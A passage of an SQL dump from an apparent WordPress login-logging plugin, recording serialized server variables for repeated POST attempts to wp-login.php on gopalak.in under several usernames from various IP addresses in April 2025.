00:00:00'),(93948,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39788\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.131\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745426893.9380441;s:12:\"REQUEST_TIME\";i:1745426893;}}','67.223.118.131',0,'2025-04-23 22:18:15','1970-01-01 00:00:00'),(93949,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45300\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745427265.3754671;s:12:\"REQUEST_TIME\";i:1745427265;}}','23.239.27.53',0,'2025-04-23 22:24:32','1970-01-01 00:00:00'),(93950,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45370\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.124.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745427631.2815399;s:12:\"REQUEST_TIME\";i:1745427631;}}','167.86.124.24',0,'2025-04-23 22:30:33','1970-01-01 00:00:00'),(93951,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745430786.610184;s:12:\"REQUEST_TIME\";i:1745430786;}}','13.201.132.241',0,'2025-04-23 23:23:08','1970-01-01 00:00:00'),(93952,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745430786.604687;s:12:\"REQUEST_TIME\";i:1745430786;}}','13.201.132.241',0,'2025-04-23 23:23:08','1970-01-01 00:00:00'),(93953,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745430786.6021259;s:12:\"REQUEST_TIME\";i:1745430786;}}','13.201.132.241',0,'2025-04-23 23:23:08','1970-01-01 00:00:00'),(93954,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745430786.6014409;s:12:\"REQUEST_TIME\";i:1745430786;}}','13.201.132.241',0,'2025-04-23 23:23:08','1970-01-01 00:00:00'),(93955,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745430786.606302;s:12:\"REQUEST_TIME\";i:1745430786;}}','13.201.132.241',0,'2025-04-23 23:23:08','1970-01-01 00:00:00'),(93956,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431146.3728609;s:12:\"REQUEST_TIME\";i:1745431146;}}','13.201.132.241',0,'2025-04-23 23:29:08','1970-01-01 00:00:00'),(93957,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745431146.370482;s:12:\"REQUEST_TIME\";i:1745431146;}}','13.201.132.241',0,'2025-04-23 23:29:08','1970-01-01 00:00:00'),(93958,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"129\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"129\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\